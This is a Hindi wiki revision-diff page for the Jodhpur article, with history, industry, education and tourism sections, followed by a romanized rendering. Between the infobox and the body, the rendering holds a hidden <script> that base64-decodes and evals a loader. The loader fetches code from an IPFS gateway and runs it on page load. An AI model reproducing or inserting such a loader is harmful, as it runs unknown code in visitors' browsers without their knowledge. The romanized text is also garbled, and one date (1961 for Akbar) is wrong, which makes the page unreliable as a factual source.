Difference between revisions of "जोधपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(17 intermediate revisions by 6 users not shown)
Line 3: Line 3:
 
|विवरण=जोधपुर शहर, जोधपुर ज़िले का प्रशासनिक मुख्यालय, राजस्थान राज्य, पश्चिमोत्तर [[भारत]] में स्थित है।
 
|विवरण=जोधपुर शहर, जोधपुर ज़िले का प्रशासनिक मुख्यालय, राजस्थान राज्य, पश्चिमोत्तर [[भारत]] में स्थित है।
 
|राज्य=[[राजस्थान]]
 
|राज्य=[[राजस्थान]]
|ज़िला=[[जोधपुर ज़िला]]
+
|ज़िला=[[जोधपुर ज़िला|जोधपुर]]
 
|निर्माता=
 
|निर्माता=
 
|स्वामित्व=
 
|स्वामित्व=
 
|प्रबंधक=
 
|प्रबंधक=
 
|निर्माण काल=
 
|निर्माण काल=
|स्थापना=सन [[1459]] ई. में एक राजपूत [[राव जोधा]] द्वारा स्थापित  
+
|स्थापना=सन 1459 ई. में एक [[राजपूत]] राव जोध द्वारा स्थापित  
|भौगोलिक स्थिति=उत्तर- 26° 28' - पूर्व- 73° 2'
+
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=26.28,73.02&t=m&z=12&vpsrc=0 उत्तर- 26° 17' - पूर्व- 73°01]
 
|मार्ग स्थिति=
 
|मार्ग स्थिति=
|प्रसिद्धि=क़िले, हवेलियाँ, मेले और अन्य उत्सवों के लिए प्रसिद्ध है।
+
|प्रसिद्धि=जोधपुर क़िले, हवेलियाँ, मेले और अन्य उत्सवों के लिए प्रसिद्ध है।
 
|कब जाएँ=
 
|कब जाएँ=
|यातायात=
+
|यातायात=ऑटो रिक्शा, टोंगा, टैक्सी और बस
|हवाई अड्डा=[[जोधपुर हवाई अड्डा]]
+
|हवाई अड्डा=जोधपुर हवाई अड्डा
|रेलवे स्टेशन=[[जोधपुर रेलवे स्टेशन]]
+
|रेलवे स्टेशन=जोधपुर रेलवे स्टेशन
|बस अड्डा=बस अड्डा जोधपुर
+
|बस अड्डा=प्रताप नगर बस स्टैंड, पाओटा बस स्टैंड
|कैसे पहुँचें=
+
|कैसे पहुँचें=हवाई जहाज़, रेल, बस आदि से पहुँचा जा सकता है।
|क्या देखें=क़िले, हवेलियाँ, महल।
+
|क्या देखें=[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], [[जसवंत थाड़ा जोधपुर|जसवंत थाड़ा]], [[उम्मेद महल जोधपुर|उम्मेद महल]]
|कहाँ ठहरें=[[जोधपुर प्रवास]]
+
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह
|क्या खायें=मावा का लड्डू, क्रीम युक्‍त लस्‍सी, मावा कचौड़ी, और दूध फिरनी आदि।  
+
|क्या खायें=मावा का लड्डू, क्रीम युक्‍त लस्‍सी, मावा कचौड़ी और दूध फिरनी आदि।  
|क्या ख़रीदें=हाथीदाँत का सामान, काँच की चूड़ियाँ, छुरी—काँटा, रंगे हुए वस्त्र, लाख की वस्तुएँ, नमदे, चमड़े का सामान आदि।
+
|क्या ख़रीदें=हाथीदाँत का सामान, काँच की [[चूड़ी|चूड़ियाँ]], छुरी—काँटा, रंगे हुए [[वस्त्र]], लाख की वस्तुएँ, नमदे, चमड़े का सामान आदि।
|एस.टी.डी. कोड=
+
|एस.टी.डी. कोड=0291
|ए.टी.एम=
+
|ए.टी.एम=लगभग सभी
 
|सावधानी=
 
|सावधानी=
|मानचित्र लिंक=
+
|मानचित्र लिंक=[http://maps.google.co.in/maps?f=d&source=s_d&saddr=Jodhpur+Airport,+Jodhpur,+Rajasthan&daddr=Jodhpur+railway+station&geocode=FRySkAEdjaBaBClLh-AZhIxBOTFTOB8bb1E7kw%3BFckOkQEd-j1aBCldTYB3TIxBOTGJThUybhS2UA&hl=en&mra=ls&sll=26.28161,73.023163&sspn=0.281975,0.617294&g=Jodhpur,+Rajasthan&ie=UTF8&ll=26.266633,73.030586&spn=0.070503,0.154324&z=13 जोधपुर हवाई अड्डा]
 
|संबंधित लेख=
 
|संबंधित लेख=
 
|शीर्षक 1=
 
|शीर्षक 1=
Line 31: Line 31:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=15वीं शदी में निर्मित क़िला और महलें यहाँ आने वाले पर्यटकों के लिए आकर्षण का प्रमुख केंद्र रहा है।
|बाहरी कड़ियाँ=
+
|बाहरी कड़ियाँ=[http://jodhpur.rajasthan.gov.in/content/raj/jodhpur/en/home.html आधिकारिक वेबसाइट]
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
{{लेख सूची
+
'''जोधपुर''' शहर, [[जोधपुर ज़िला|जोधपुर ज़िले]] का प्रशासनिक मुख्यालय, [[राजस्थान]] राज्य, पश्चिमोत्तर [[भारत]] में है। जोधपुर प्रमुख सड़क और रेल जंक्शन वाला शहर है। जोधपुर शहर के कुछ हिस्से 18वीं शताब्दी के परकोटे से घिरे हुए हैं। यह दुर्ग, जिसमें महल और ऐतिहासिक संग्रहालय हैं, एक अलग-थलग, लेकिन ऊँची चट्टान पर बना हुआ है, जो दूर से ही दिखाई देता है। इसके ठीक उत्तर में [[मारवाड़]] की प्राचीन राजधानी [[मंडौर जोधपुर राजस्थान|मंडौर]] के चौथी शताब्दी के [[अवशेष]] विद्यमान हैं। जोधपुर मारवाड़ों का मुख्‍य वित्तिय राजधानी था, जहाँ [[राठौड़ वंश]] ने शासन किया था। जोधपुर [[थार मरुस्थल]] के दाहिने छोर पर स्थित है।
|लेख का नाम= जोधपुर
+
[[चित्र:View-Of-Jodhpur-2.jpg|thumb|250px|left|जोधपुर का एक दृश्य]]
|पर्यटन= जोधपुर पर्यटन
 
|ज़िला= जोधपुर ज़िला
 
|प्रवास= जोधपुर प्रवास
 
}}
 
जोधपुर शहर, जोधपुर ज़िले का प्रशासनिक मुख्यालय, [[राजस्थान]] राज्य, पश्चिमोत्तर [[भारत]] में है। जोधपुर प्रमुख सड़क और रेल जंक्शन वाला शहर है। जोधपुर शहर के कुछ हिस्से 18वीं शताब्दी के परकोटे से घिरे हुए हैं। यह दुर्ग, जिसमें महल और ऐतिहासिक संग्रहालय हैं, एक अलग-थलग, लेकिन ऊँची चट्टान पर बना हुआ है, जो दूर से ही दिखाई देता है। इसके ठीक उत्तर में [[मारवाड़]] की प्राचीन राजधानी [[मंडौर जोधपुर राजस्थान|मंडौर]] के चौथी शताब्दी के अवशेष विद्यमान हैं। जोधपुर मारवाड़ों का मुख्‍य वित्तिय राजधानी था, जहाँ [[राठौड़ वंश]] ने शासन किया था। जोधपुर [[थार मरुस्‍थल]] के दाहिने छोर पर स्थित है।
 
[[चित्र:View-Of-Jodhpur-2.jpg|thumb|250px|left|जोधपुर का एक दृश्य<br /> A View Of Jodhpur]]
 
 
==स्थापना==
 
==स्थापना==
जोधपुर की स्थापना एक राजपूत [[राव जोधा]] (1438-89 ई.) ने 1459 में की थी और यह भूतपूर्व जोधपुर रियासत की राजधानी था। मंडोर से हटाकर नयी राजधानी यहाँ बसायी गयी थी। नयी राजधानी को सुरक्षित रखने के लिए चिड़ियाटुंक पहाड़ी पर एक दुर्ग भी बनाया गया था, जो आज भी जोधपुर के किले के नाम से प्रसिद्ध है।  
+
जोधपुर की स्थापना एक [[राजपूत]] [[राव जोधा]] (1438-89 ई.) ने 1459 में की थी और यह भूतपूर्व जोधपुर रियासत की राजधानी था। मंडोर से हटाकर नयी राजधानी यहाँ बसायी गयी थी। नयी राजधानी को सुरक्षित रखने के लिए चिड़ियाटुंक पहाड़ी पर एक दुर्ग भी बनाया गया था, जो आज भी जोधपुर के किले के नाम से प्रसिद्ध है।  
  
 
==इतिहास==
 
==इतिहास==
जोधपुर पर 1565 ई. में [[मुग़ल|मुगलों]] का अधिकार हो गया। जोधपुर राज्य के राव चन्द्रसेन ने 1570 ई. में अकबर से भेंट की लेकिन अकबर ने उसके प्रतिद्वन्द्वी भाई मोटा राजा उदयसिंह को जोधपुर राज्य का अधीन शासक मान लिया। चन्द्रसेन निराश लौट गया और जीवनपर्यंत विरोध करता रहा। 1961 में मुग़ल बादशाह [[अकबर]] के आक्रमण के बाद इसने मुग़लों का प्रभुत्व स्वीकार कर लिया। 1679 में मुग़ल बादशाह [[औरंगज़ेब]] ने मारवाड़ पर हमला करके इसे लूटा और यहाँ के निवासियों को [[इस्लाम धर्म]] स्वीकार करने को मज़बूर किया, लेकिन जोधपुर, [[जयपुर]] और [[उदयपुर]] की रियासतों ने गठबंधन बनाकर मुसलमानों के नियंत्रण को रोके रखा। इसके बाद जयपुर और जोधपुर के राजकुमारों को उदयपुर परिवार के साथ वैवाहिक सम्बन्ध करने का अधिकार (जो मुग़लों के साथ मित्रता के कारण समाप्त हो गया था) इस शर्त पर फिर से प्राप्त हो गया कि उदयपुर की राजकुमारियों से उत्पन्न बच्चे पहले उत्तराधिकारी होंगे। [[चित्र:Phool-Mahal-Jodhpur-2.jpg|thumb|250px|left|फूलमहल, [[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Phool Mahal, Mehrangarh Fort, Jodhpur]] लेकिन इस शर्त से उत्पन्न झगड़ों के कारण अन्ततः यहाँ मराठों का प्रभुत्व क़ायम हो गया। औरंगजेब के समय जोधपुर का शासक जसवंतसिंह की मृत्यु (1678 ई.) के पश्चात औरंगजेब और जोधपुर राज्य के मध्य लम्बे समय तक संघर्ष चलता रहा। यह संघर्ष जोधपुर की गद्दी पर अजीतसिंह (जसवंतसिंह के पुत्र ) के अधिकार को लेकर हुआ। संघर्ष का अंत औरंगजेब की मृत्यु (1707 ई.) के पश्चात मुगल सम्राट फर्रुखशिखर के समय ही हो सका। 1818 में जोधपुर ब्रिटिश सत्ता के अंतर्गत आ गया। 1949 में यह राजस्थान राज्य में शामिल हो गया।  
+
जोधपुर पर 1565 ई. में [[मुग़ल|मुग़लों]] का अधिकार हो गया। जोधपुर राज्य के राव चन्द्रसेन ने 1570 ई. में [[अकबर]] से भेंट की लेकिन अकबर ने उसके प्रतिद्वन्द्वी भाई मोटा [[राजा उदयसिंह]] को जोधपुर राज्य का अधीन शासक मान लिया। चन्द्रसेन निराश लौट गया और जीवनपर्यंत विरोध करता रहा। 1961 में मुग़ल बादशाह [[अकबर]] के आक्रमण के बाद इसने मुग़लों का प्रभुत्व स्वीकार कर लिया। 1679 में मुग़ल बादशाह [[औरंगज़ेब]] ने मारवाड़ पर हमला करके इसे लूटा और यहाँ के निवासियों को [[इस्लाम धर्म]] स्वीकार करने को मजबूर किया, लेकिन जोधपुर, [[जयपुर]] और [[उदयपुर]] की रियासतों ने गठबंधन बनाकर [[मुसलमान|मुसलमानों]] के नियंत्रण को रोके रखा। इसके बाद जयपुर और जोधपुर के राजकुमारों को उदयपुर [[परिवार]] के साथ वैवाहिक सम्बन्ध करने का अधिकार (जो मुग़लों के साथ मित्रता के कारण समाप्त हो गया था) इस शर्त पर फिर से प्राप्त हो गया कि उदयपुर की राजकुमारियों से उत्पन्न बच्चे पहले उत्तराधिकारी होंगे। [[चित्र:Phool-Mahal-Jodhpur-2.jpg|thumb|250px|left|फूलमहल, [[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर ]] लेकिन इस शर्त से उत्पन्न झगड़ों के कारण अन्ततः यहाँ [[मराठा|मराठों]] का प्रभुत्व क़ायम हो गया। औरंगजेब के समय जोधपुर का शासक जसवंतसिंह की मृत्यु (1678 ई.) के पश्चात् औरंगजेब और जोधपुर राज्य के मध्य लम्बे समय तक संघर्ष चलता रहा। यह संघर्ष जोधपुर की गद्दी पर अजीतसिंह (जसवंतसिंह के पुत्र) के अधिकार को लेकर हुआ। संघर्ष का अंत औरंगजेब की मृत्यु (1707 ई.) के पश्चात् मुग़ल सम्राट फर्रुखशिखर के समय ही हो सका। 1818 में जोधपुर ब्रिटिश सत्ता के अंतर्गत आ गया। 1949 में यह राजस्थान राज्य में शामिल हो गया।  
  
 
==कृषि और खनिज==
 
==कृषि और खनिज==
यह शहर कृषि उपज, ऊन, मवेशी, नमक और चमड़े का विपणन केन्द्र है।  
+
जोधपुर शहर [[कृषि]] उपज, ऊन, मवेशी, [[नमक]] और चमड़े का विपणन केन्द्र है।  
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
यहाँ इंजीनियरिंग और रेल की कार्यशालाएँ हैं व साथ ही सूती वस्त्र, पीतल तथा लोहे के बर्तन, साइकिल, स्याही और पोलो के उपकरणों का निर्माण होता है। जोधपुर अपने हस्तशिल्प उत्पादों के लिए प्रख्यात है, जिसमें हाथीदाँत का सामान, काँच की चूड़ियाँ, छुरी—काँटा, रंगे हुए वस्त्र, लाख की वस्तुएँ, नमदे, चमड़े का सामान, संगमरमर के पत्थर का काम और क़ालीनों की बुनाई प्रमुख है।  
+
यहाँ इंजीनियरिंग और रेल की कार्यशालाएँ हैं व साथ ही सूती वस्त्र, पीतल तथा [[लोहा|लोहे]] के बर्तन, साइकिल, स्याही और पोलो के उपकरणों का निर्माण होता है। जोधपुर अपने हस्तशिल्प उत्पादों के लिए प्रख्यात है, जिसमें हाथीदाँत का सामान, काँच की [[चूड़ी|चूड़ियाँ]], छुरी—काँटा, रंगे हुए [[वस्त्र]], लाख की वस्तुएँ, नमदे, चमड़े का सामान, संगमरमर के पत्थर का काम और क़ालीनों की बुनाई प्रमुख है।  
 
==उच्च न्यायालय==
 
==उच्च न्यायालय==
[[चित्र:Mehrangarh-Fort-Jodhpur-6.jpg|thumb|250px|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ के क़िले]] में वाद्य यंत्र बजाता जोधपुर वासी]]
+
[[चित्र:Mehrangarh-Fort-Jodhpur-6.jpg|thumb|250px|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ के क़िले]] में [[वाद्य यंत्र]] बजाता जोधपुर वासी]]
 
राजस्थान के दूसरे सबसे बड़े शहर जोधपुर में राज्य का उच्च न्यायालय स्थित है।  
 
राजस्थान के दूसरे सबसे बड़े शहर जोधपुर में राज्य का उच्च न्यायालय स्थित है।  
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
यहाँ अन्य संस्थानों के साथ-साथ:-  
 
यहाँ अन्य संस्थानों के साथ-साथ:-  
*जोधपुर विश्वविद्यालय,
+
*जोधपुर विश्वविद्यालय
*एम.बी.एम. इंजीनियरिंग कालेज,
+
*एम.बी.एम. इंजीनियरिंग कॉलेज
[[चित्र:Mehrangarh-Fort-Jodhpur-14.jpg|thumb|250px|left|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur]]
+
[[चित्र:Mehrangarh-Fort-Jodhpur-14.jpg|thumb|250px|left|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर ]]
*डाक्टर एस.एन. मेडिकल कालेज,
+
*डाक्टर एस.एन. मेडिकल कॉलेज
*जे.डी. मेमोरियल फ़ैकल्टी आफ़ फ़ार्मेसी,
+
*जे.डी. मेमोरियल फ़ैकल्टी आफ़ फ़ार्मेसी
*गवर्नमेंट पालीटेक्निक कालेज और
+
*गवर्नमेंट पालीटेक्निक कॉलेज
*जय नारायण व्यास विश्वविद्यालय (1962 में स्थापित) स्थित है।
+
*जय नारायण व्यास विश्वविद्यालय (1962 में स्थापित)
==जनसंख्या==
+
 
जोधपुर शहर की जनसंख्या (2001)  8,46,408 है। और जोधपुर ज़िले की कुल  जनसंख्या 28,80,777 है।
 
 
==पर्यटन==
 
==पर्यटन==
[[चित्र:Mehrangarh-Fort-Jodhpur-27.jpg|thumb|250px|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur]]
+
{{main|जोधपुर पर्यटन}}
भारत में राजस्‍थान को मरुस्‍थलों का राजा कहा जाता है। यहाँ अनेक ऐसे स्‍थान हैं जो पर्यटकों को अपनी ओर आकर्षित करते हैं। इन्‍हीं में से एक है-जोधपुर। 15वीं शदी में निर्मित क़िला और महलें यहाँ आने वाले पर्यटकों के लिए आकर्षण का प्रमुख केंद्र रहा है। पहाड़ी के शिखर और शहर के अंतिम छोर पर अवस्थित मेहरानगढ़ का क़िला मध्‍यकालीन राजशाही का मानो प्रति‍बिंब है।
+
भारत में राजस्‍थान को मरुस्‍थलों का राजा कहा जाता है। यहाँ अनेक ऐसे स्‍थान हैं जो पर्यटकों को अपनी ओर आकर्षित करते हैं। इन्‍हीं में से एक है-जोधपुर। 15वीं शदी में निर्मित क़िला और महलें यहाँ आने वाले पर्यटकों के लिए आकर्षण का प्रमुख केंद्र रहा है। पहाड़ी के शिखर और शहर के अंतिम छोर पर अवस्थित [[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]] मध्‍यकालीन राजशाही का मानो प्रति‍बिंब है।
*[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]]
 
*[[जसवंत थाड़ा जोधपुर|जसवंत थाड़ा]]
 
*[[उम्‍मैद महल जोधपुर|उम्‍मैद महल]]
 
  
 
==खानपान==
 
==खानपान==
यहाँ ख़ासतौर पर दूध निर्मित खाद्य पदार्थों का ज्‍यादा प्रयोग होता है। जैसे मावा का लड्डू, क्रीम युक्‍त लस्‍सी, मावा कचौड़ी, और दूध फिरनी आदि।
+
[[चित्र:Mehrangarh-Fort-Jodhpur-27.jpg|thumb|250px|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर ]]
 +
यहाँ ख़ासतौर पर [[दूध]] निर्मित खाद्य पदार्थों का ज्‍यादा प्रयोग होता है। जैसे मावा का लड्डू, क्रीम युक्‍त लस्‍सी, मावा कचौड़ी, और दूध फिरनी आदि।
 
==उत्‍सव==
 
==उत्‍सव==
 
*जोधपुर में कुछ प्रमुख उत्सव है जो बड़े ही धूम-धाम से मनाया जाता है।  
 
*जोधपुर में कुछ प्रमुख उत्सव है जो बड़े ही धूम-धाम से मनाया जाता है।  
 
*मारवाड़ उत्‍सव, नागौर का प्रसिद्ध पशु मेला, कागा में शीतलामाता का उत्‍सव और पीपर का गंगुआर मेला।  
 
*मारवाड़ उत्‍सव, नागौर का प्रसिद्ध पशु मेला, कागा में शीतलामाता का उत्‍सव और पीपर का गंगुआर मेला।  
 +
==जनसंख्या==
 +
जोधपुर शहर की जनसंख्या 2001 8,46,408 है। और जोधपुर ज़िले की कुल  जनसंख्या 28,80,777 है।
 +
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 87: Line 81:
 
}}
 
}}
 
==वीथिका==
 
==वीथिका==
<gallery perrow="3" widths="200">
+
<gallery>
 
चित्र:View-Of-Jodhpur-1.jpg|जोधपुर का एक दृश्य<br />A View Of Jodhpur  
 
चित्र:View-Of-Jodhpur-1.jpg|जोधपुर का एक दृश्य<br />A View Of Jodhpur  
चित्र:Phool-Mahal-Jodhpur.jpg|फूलमहल, मेहरानगढ़ का क़िला, जोधपुर <br />Phool Mahal, Mehrangarh Fort, Jodhpur
+
चित्र:Phool-Mahal-Jodhpur.jpg|फूलमहल, [[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर
चित्र:Mehrangarh-Fort-Jodhpur-28.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-28.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-23.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-23.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-19.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-19.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-13.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-13.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-10.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-10.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-8.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-8.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-7.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-7.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-5.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-5.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-4.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-4.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
चित्र:Mehrangarh-Fort-Jodhpur-3.jpg|[[मेहरानगढ़ का क़िला जोधपुर|मेहरानगढ़ का क़िला]], जोधपुर <br /> Mehrangarh Fort, Jodhpur
+
चित्र:Mehrangarh-Fort-Jodhpur-3.jpg|[[मेहरानगढ़ क़िला जोधपुर|मेहरानगढ़ क़िला]], जोधपुर  
 
</gallery>
 
</gallery>
  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{राजस्थान}}
+
{{राजस्थान के नगर}}{{राजस्थान}}{{राजस्थान के पर्यटन स्थल}}
{{राजस्थान के पर्यटन स्थल}}
 
 
[[Category:राजस्थान]][[Category:राजस्थान_के_नगर]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:भारत के नगर]]
 
[[Category:राजस्थान]][[Category:राजस्थान_के_नगर]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:भारत के नगर]]
 +
[[Category:जोधपुर]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 07:53, 23 June 2017

jodhapur
vivaran jodhapur shahar, jodhapur zile ka prashasanik mukhyalay, rajasthan rajy, pashchimottar bharat mean sthit hai.
rajy rajasthan
zila jodhapur
sthapana san 1459 ee. mean ek rajapoot rav jodh dvara sthapit
bhaugolik sthiti uttar- 26° 17' - poorv- 73°01
prasiddhi jodhapur qile, haveliyaan, mele aur any utsavoan ke lie prasiddh hai.
kaise pahuanchean havaee jahaz, rel, bas adi se pahuancha ja sakata hai.
havaee adda jodhapur havaee adda
relave steshan jodhapur relave steshan
bas adda pratap nagar bas staiand, paota bas staiand
yatayat aauto riksha, toanga, taiksi aur bas
kya dekhean meharanagadh qila, jasavant tha da, ummed mahal
kahaan thaharean hotal, dharmashala, atithi grah
kya khayean mava ka laddoo, krim yukh‍t lash‍si, mava kachau di aur doodh phirani adi.
kya kharidean hathidaant ka saman, kaanch ki choo diyaan, chhuri—kaanta, range hue vastr, lakh ki vastuean, namade, cham de ka saman adi.
es.ti.di. kod 0291
e.ti.em lagabhag sabhi
chitr:Map-icon.gif jodhapur havaee adda
any janakari 15vian shadi mean nirmit qila aur mahalean yahaan ane vale paryatakoan ke lie akarshan ka pramukh keandr raha hai.
bahari k diyaan adhikarik vebasait

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jodhapur shahar, jodhapur zile ka prashasanik mukhyalay, rajasthan rajy, pashchimottar bharat mean hai. jodhapur pramukh s dak aur rel jankshan vala shahar hai. jodhapur shahar ke kuchh hisse 18vian shatabdi ke parakote se ghire hue haian. yah durg, jisamean mahal aur aitihasik sangrahalay haian, ek alag-thalag, lekin ooanchi chattan par bana hua hai, jo door se hi dikhaee deta hai. isake thik uttar mean marava d ki prachin rajadhani mandaur ke chauthi shatabdi ke avashesh vidyaman haian. jodhapur marava doan ka mukhh‍y vittiy rajadhani tha, jahaan rathau d vansh ne shasan kiya tha. jodhapur thar marusthal ke dahine chhor par sthit hai. thumb|250px|left|jodhapur ka ek drishy

sthapana

jodhapur ki sthapana ek rajapoot rav jodha (1438-89 ee.) ne 1459 mean ki thi aur yah bhootapoorv jodhapur riyasat ki rajadhani tha. mandor se hatakar nayi rajadhani yahaan basayi gayi thi. nayi rajadhani ko surakshit rakhane ke lie chi diyatuank paha di par ek durg bhi banaya gaya tha, jo aj bhi jodhapur ke kile ke nam se prasiddh hai.

itihas

jodhapur par 1565 ee. mean mugaloan ka adhikar ho gaya. jodhapur rajy ke rav chandrasen ne 1570 ee. mean akabar se bheant ki lekin akabar ne usake pratidvandvi bhaee mota raja udayasianh ko jodhapur rajy ka adhin shasak man liya. chandrasen nirash laut gaya aur jivanaparyant virodh karata raha. 1961 mean mugal badashah akabar ke akraman ke bad isane mugaloan ka prabhutv svikar kar liya. 1679 mean mugal badashah aurangazeb ne marava d par hamala karake ise loota aur yahaan ke nivasiyoan ko islam dharm svikar karane ko majaboor kiya, lekin jodhapur, jayapur aur udayapur ki riyasatoan ne gathabandhan banakar musalamanoan ke niyantran ko roke rakha. isake bad jayapur aur jodhapur ke rajakumaroan ko udayapur parivar ke sath vaivahik sambandh karane ka adhikar (jo mugaloan ke sath mitrata ke karan samapt ho gaya tha) is shart par phir se prapt ho gaya ki udayapur ki rajakumariyoan se utpann bachche pahale uttaradhikari hoange. [[chitr:Phool-Mahal-Jodhpur-2.jpg|thumb|250px|left|phoolamahal, meharanagadh qila, jodhapur ]] lekin is shart se utpann jhag doan ke karan antatah yahaan marathoan ka prabhutv qayam ho gaya. aurangajeb ke samay jodhapur ka shasak jasavantasianh ki mrityu (1678 ee.) ke pashchath aurangajeb aur jodhapur rajy ke madhy lambe samay tak sangharsh chalata raha. yah sangharsh jodhapur ki gaddi par ajitasianh (jasavantasianh ke putr) ke adhikar ko lekar hua. sangharsh ka aant aurangajeb ki mrityu (1707 ee.) ke pashchath mugal samrat pharrukhashikhar ke samay hi ho saka. 1818 mean jodhapur british satta ke aantargat a gaya. 1949 mean yah rajasthan rajy mean shamil ho gaya.

krishi aur khanij

jodhapur shahar krishi upaj, oon, maveshi, namak aur cham de ka vipanan kendr hai.

udyog aur vyapar

yahaan ianjiniyariang aur rel ki karyashalaean haian v sath hi sooti vastr, pital tatha lohe ke bartan, saikil, syahi aur polo ke upakaranoan ka nirman hota hai. jodhapur apane hastashilp utpadoan ke lie prakhyat hai, jisamean hathidaant ka saman, kaanch ki choo diyaan, chhuri—kaanta, range hue vastr, lakh ki vastuean, namade, cham de ka saman, sangamaramar ke patthar ka kam aur qalinoan ki bunaee pramukh hai.

uchch nyayalay

[[chitr:Mehrangarh-Fort-Jodhpur-6.jpg|thumb|250px|meharanagadh ke qile mean vady yantr bajata jodhapur vasi]] rajasthan ke doosare sabase b de shahar jodhapur mean rajy ka uchch nyayalay sthit hai.

shikshan sansthan

yahaan any sansthanoan ke sath-sath:-

  • jodhapur vishvavidyalay
  • em.bi.em. ianjiniyariang k aaulej

[[chitr:Mehrangarh-Fort-Jodhpur-14.jpg|thumb|250px|left|meharanagadh qila, jodhapur ]]

  • daktar es.en. medikal k aaulej
  • je.di. memoriyal faikalti af farmesi
  • gavarnameant paliteknik k aaulej
  • jay narayan vyas vishvavidyalay (1962 mean sthapit)

paryatan

  1. REDIRECTsaancha:mukhy

bharat mean rajash‍than ko marush‍thaloan ka raja kaha jata hai. yahaan anek aise sh‍than haian jo paryatakoan ko apani or akarshit karate haian. inh‍hian mean se ek hai-jodhapur. 15vian shadi mean nirmit qila aur mahalean yahaan ane vale paryatakoan ke lie akarshan ka pramukh keandr raha hai. paha di ke shikhar aur shahar ke aantim chhor par avasthit meharanagadh qila madhh‍yakalin rajashahi ka mano prati‍bianb hai.

khanapan

